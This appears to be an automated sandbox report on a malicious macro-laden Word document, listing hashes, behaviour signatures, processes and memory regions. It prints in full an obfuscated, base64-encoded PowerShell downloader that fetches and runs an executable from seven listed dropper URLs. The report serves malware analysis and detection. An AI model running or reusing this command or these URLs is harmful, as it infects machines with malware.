Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    11/06/2024, 11:00

General

  • Target

    9df3dfb3086ef49424497bc720f197cf_JaffaCakes118.doc

  • Size

    152KB

  • MD5

    9df3dfb3086ef49424497bc720f197cf

  • SHA1

    4052642c9a465f9af8c775290b228c115a241fc0

  • SHA256

    0d03a769eb60d885882b834ddd84cc95d6194f91253998018f25169605161758

  • SHA512

    d4fa10ddcefa5fce6130cfe45bb32c671dbd3b7a01db2a6ffe0e5fc6051d78f0495bbf4ebe8a91083e58e45a4fe8ce0c432e024cbd3865c48ebb4ae54c77cb83

  • SSDEEP

    1536:VCOIDQhDHR4OIDQhDHRdrdi1Ir77zOH98Wj2gpngB+a9w7Qb4HrO4u9HA:VzrfrzOH98ipgM7I4HrO4u9HA

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://cnnmediaservices.com/wp-admin/czBMOhz/

exe.dropper

http://ak3.net/t0XJ/

exe.dropper

http://ovday.com/1umq/S5IWl04/

exe.dropper

http://gch7.com/wp-includes/Nkwp/

exe.dropper

http://chengmikeji.com/wp-includes/9QQ/

exe.dropper

http://blog.anseeing.com/sys-cache/h/

exe.dropper

http://1sync-wp.x.opencrm.eu/wp-content/Bu/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9df3dfb3086ef49424497bc720f197cf_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABEAGwAagBxAGMAcQB0AD0AKAAnAEYAJwArACgAJwA4ADcAcABiACcAKwAnADYAJwApACsAJwB2ACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAGUAcgBwAFIATwBmAGkATABFAFwAeQBzADEASAAyAG4AeABcAEMANgBOADYAdgB5AHEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBjAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAGMAVQBSAEkAVAB5AFAAcgBPAFQAYABvAEMAYABvAEwAIgAgAD0AIAAoACcAdAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACsAKAAnACwAIAB0ACcAKwAnAGwAJwApACsAKAAnAHMAMQAnACsAJwAxACwAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQATgBfAHUAbgBxAG4ANgAgAD0AIAAoACcASAAnACsAJwAzACcAKwAoACcAdgAnACsAJwBoAGsAJwArACcAcQB6AHIAJwApACsAJwAyACcAKQA7ACQATAA1ADgAdQBmADUAdQA9ACgAKAAnAEcAZgBlAHAAJwArACcAaQAnACkAKwAnAHQAXwAnACkAOwAkAFYAbgB5AHQAeQBrAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwBuAEwAJwArACcASgBZACcAKwAnAHMAMQBoADIAbgAnACkAKwAoACcAeABuAEwASgBDACcAKwAnADYAJwApACsAJwBuACcAKwAoACcANgB2AHkAJwArACcAcQAnACkAKwAoACcAbgAnACsAJwBMAEoAJwApACkAIAAgAC0AQwBSAEUAcABMAEEAQwBFACAAKABbAEMASABhAHIAXQAxADEAMAArAFsAQwBIAGEAcgBdADcANgArAFsAQwBIAGEAcgBdADcANAApACwAWwBDAEgAYQByAF0AOQAyACkAKwAkAE4AXwB1AG4AcQBuADYAKwAoACgAJwAuAGUAJwArACcAeAAnACkAKwAnAGUAJwApADsAJABBADYAcwBoAF8AaQBqAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnAGQAaQAnACsAJwBiAHoAdwAnACkAKQA7ACQASQA0ADIAYwA1ADIAXwA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBjAGwAaQBFAG4AVAA7ACQATgB3AHgAbgBwAHYAaAA9ACgAKAAnAGgAdAB0ACcAKwAnAHAAJwApACsAKAAnADoALwAvACcAKwAnAGMAbgBuAG0AJwApACsAJwBlAGQAJwArACcAaQBhACcAKwAnAHMAJwArACgAJwBlACcAKwAnAHIAdgBpACcAKQArACcAYwBlACcAKwAoACcAcwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AYwB6ACcAKwAnAEIAJwApACsAKAAnAE0ATwBoACcAKwAnAHoALwAqACcAKwAnAGgAdAAnACkAKwAoACcAdAAnACsAJwBwADoALwAnACkAKwAoACcALwAnACsAJwBhAGsAMwAuACcAKwAnAG4AZQB0ACcAKQArACgAJwAvAHQAMABYACcAKwAnAEoALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKwAnAC8AJwApACsAKAAnAG8AdgAnACsAJwBkACcAKwAnAGEAeQAuAGMAJwArACcAbwBtAC8AMQAnACkAKwAoACcAdQBtAHEAJwArACcALwAnACkAKwAnAFMANQAnACsAKAAnAEkAVwBsACcAKwAnADAAJwApACsAKAAnADQAJwArACcALwAqAGgAdAAnACkAKwAoACcAdABwADoAJwArACcALwAvACcAKQArACcAZwAnACsAJwBjACcAKwAnAGgANwAnACsAKAAnAC4AYwBvAG0AJwArACcALwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAJwBjACcAKwAnAGwAJwArACcAdQBkACcAKwAnAGUAJwArACgAJwBzAC8ATgAnACsAJwBrAHcAJwArACcAcAAvACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAOgAvACcAKwAnAC8AJwArACcAYwBoACcAKwAnAGUAbgBnAG0AaQBrAGUAJwApACsAKAAnAGoAaQAuAGMAbwBtAC8AJwArACcAdwAnACsAJwBwACcAKQArACgAJwAtAGkAJwArACcAbgBjAGwAdQBkAGUAJwApACsAJwBzAC8AJwArACgAJwA5AFEAJwArACcAUQAvACoAaAAnACkAKwAoACcAdAB0AHAAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGIAJwArACcAbABvACcAKQArACgAJwBnAC4AYQBuAHMAJwArACcAZQAnACkAKwAoACcAZQBpACcAKwAnAG4AJwApACsAKAAnAGcAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBzAHkAcwAtACcAKwAnAGMAYQBjAGgAZQAvACcAKwAnAGgAJwArACcALwAnACsAJwAqACcAKQArACgAJwBoACcAKwAnAHQAdABwADoALwAvADEAJwApACsAKAAnAHMAeQBuAGMAJwArACcALQAnACsAJwB3AHAALgAnACkAKwAoACcAeAAnACsAJwAuAG8AcABlAG4AJwArACcAYwByACcAKQArACcAbQAnACsAJwAuACcAKwAnAGUAJwArACgAJwB1AC8AJwArACcAdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAbgB0ACcAKwAnAC8AQgB1ACcAKQArACcALwAnACkALgAiAFMAcABMAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUwBwAF8AMQBtAHkAMgA9ACgAKAAnAFcAJwArACcANQB2AHEANgAnACkAKwAnADYAJwArACcAdAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABJAGYAYwB1ADEAYQB5ACAAaQBuACAAJABOAHcAeABuAHAAdgBoACkAewB0AHIAeQB7ACQASQA0ADIAYwA1ADIAXwAuACIAZABPAHcAYABOAGwAbwBgAEEAZABmAEkATABlACIAKAAkAEkAZgBjAHUAMQBhAHkALAAgACQAVgBuAHkAdAB5AGsAbwApADsAJABGADUAcQA2ADAAdAB6AD0AKAAoACcATwB0ACcAKwAnADAAbQAyACcAKQArACcAbABnACcAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABWAG4AeQB0AHkAawBvACkALgAiAGwAZQBgAE4AZwBgAFQAaAAiACAALQBnAGUAIAAzADEAMwA4ADEAKQAgAHsAJgAoACcASQBuAHYAJwArACcAbwBrAGUALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAoACQAVgBuAHkAdAB5AGsAbwApADsAJABJADEANQB0AGoAZgBuAD0AKAAoACcATQAnACsAJwBuAGYAeQA1ACcAKQArACcAdAAxACcAKQA7AGIAcgBlAGEAawA7ACQAQQBhAGkAaQAzADUAZwA9ACgAKAAnAFQAJwArACcAZgA0ACcAKQArACgAJwB6AG8AawAnACsAJwB0ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADgAdABmADEAdAAwAD0AKAAnAEMAMgAnACsAJwBzACcAKwAoACcAZwB0ACcAKwAnAHUAMQAnACkAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2744

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      9735965aecb631c609f659b53c34f637

      SHA1

      6cc39da6cad82f102a6360960524ee1064e92740

      SHA256

      c71f9d2c7f338d481a5f133aa89a0d077d694dc331f3d96a88761aaaeebf4310

      SHA512

      65d25d62f98528eb35d709725c608a2e9b990e5e0fdd624b84044a0f1dc9f89acfefe9a8249a3364cdbbb574463eff5308b5e967b7007884ae39a4fb720618f5

    • memory/2208-33-0x0000000005710000-0x0000000005810000-memory.dmp

      Filesize

      1024KB

    • memory/2208-50-0x0000000005710000-0x0000000005810000-memory.dmp

      Filesize

      1024KB

    • memory/2208-6-0x0000000000120000-0x0000000000220000-memory.dmp

      Filesize

      1024KB

    • memory/2208-7-0x0000000000120000-0x0000000000220000-memory.dmp

      Filesize

      1024KB

    • memory/2208-8-0x0000000005D40000-0x0000000005E40000-memory.dmp

      Filesize

      1024KB

    • memory/2208-9-0x0000000000120000-0x0000000000220000-memory.dmp

      Filesize

      1024KB

    • memory/2208-22-0x0000000005710000-0x0000000005810000-memory.dmp

      Filesize

      1024KB

    • memory/2208-23-0x0000000005710000-0x0000000005810000-memory.dmp

      Filesize

      1024KB

    • memory/2208-28-0x0000000005710000-0x0000000005810000-memory.dmp

      Filesize

      1024KB

    • memory/2208-0-0x000000002F411000-0x000000002F412000-memory.dmp

      Filesize

      4KB

    • memory/2208-2-0x000000007122D000-0x0000000071238000-memory.dmp

      Filesize

      44KB

    • memory/2208-72-0x000000007122D000-0x0000000071238000-memory.dmp

      Filesize

      44KB

    • memory/2208-34-0x0000000005710000-0x0000000005810000-memory.dmp

      Filesize

      1024KB

    • memory/2208-46-0x000000007122D000-0x0000000071238000-memory.dmp

      Filesize

      44KB

    • memory/2208-47-0x0000000000120000-0x0000000000220000-memory.dmp

      Filesize

      1024KB

    • memory/2208-48-0x0000000005710000-0x0000000005810000-memory.dmp

      Filesize

      1024KB

    • memory/2208-71-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2208-51-0x0000000005710000-0x0000000005810000-memory.dmp

      Filesize

      1024KB

    • memory/2208-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2744-41-0x00000000024E0000-0x00000000024E8000-memory.dmp

      Filesize

      32KB

    • memory/2744-40-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

      Filesize

      2.9MB